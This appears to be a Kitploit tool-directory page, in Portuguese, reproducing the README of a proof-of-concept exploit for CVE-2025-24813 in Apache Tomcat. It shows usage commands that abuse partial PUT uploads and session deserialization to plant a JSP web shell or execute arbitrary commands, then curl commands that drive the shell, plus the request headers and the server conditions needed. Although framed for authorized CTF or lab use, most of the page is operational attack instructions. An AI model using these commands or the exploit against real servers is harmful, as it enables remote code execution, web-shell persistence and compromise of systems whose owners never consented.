Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24813 — right payload for java CVE | Kitploit
Ferramentas/GitHubGitHub/loufa0/cve-2025-24813
Vulnerability ScannersExploitationWeb SecurityCTFLearning & EducationLabs & Practice
GitHubloufa0/cve-2025-24813

CVE-2025-24813

right payload for java CVE

Ver Repositório
há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24813 Tomcat PoC

PoC para um ambiente CTF/lab autorizado. Ele explora CVE-2025-24813 através da escrita PUT parcial de um arquivo de sessão Tomcat, e então aciona a desserialização com JSESSIONID.

Pré-requisitos

  • Python 3
  • Módulo Python requests
  • Java JDK (java e javac)
  • O arquivo incluído commons-collections-3.2.1.jar, colocado nesta pasta

ysoserial não é necessário.

Arquivos

  • poc_cve_2025_24813.py: wrapper Python que automatiza geração, upload e trigger.
  • GenerateTomcatSessionPayload.java: gera uma sessão Tomcat válida contendo um gadget CommonsCollections.
  • commons-collections-3.2.1.jar: dependência do gadget.
  • sh.jsp: shell JSP opcional implantado por --drop-shell.

Uso

Implantar um shell JSP no webroot padrão /opt/tomcat/webapps/ROOT:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id poc24813 \
  --drop-shell \
  --shell-name sh.jsp

Executar um comando direto sem implantar um shell:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id cmd24813 \
  --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'

Se o webroot for diferente:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --drop-shell \
  --webroot /path/to/webroot \
  --shell-name sh.jsp

Se o JAR for movido, indicar seu caminho:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --jar /path/to/commons-collections-3.2.1.jar \
  --drop-shell

Após exploração

Se --drop-shell for bem-sucedido:

root@kitploit:~
curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp

Condições do lado alvo

  • Versão Tomcat vulnerável.
  • DefaultServlet gravável, tipicamente readonly=false.
  • Suporte ao PUT parcial.
  • Sessões persistentes via PersistentManager e FileStore.
  • Cadeia de gadgets disponível no lado servidor, aqui commons-collections.

O comportamento esperado durante o upload é frequentemente HTTP 409 Conflict em:

root@kitploit:~
PUT /<session-id>/session
Content-Range: bytes 0-1000/1200

Em seguida, a desserialização é acionada com:

root@kitploit:~
Cookie: JSESSIONID=.<session-id>
Baixar ferramenta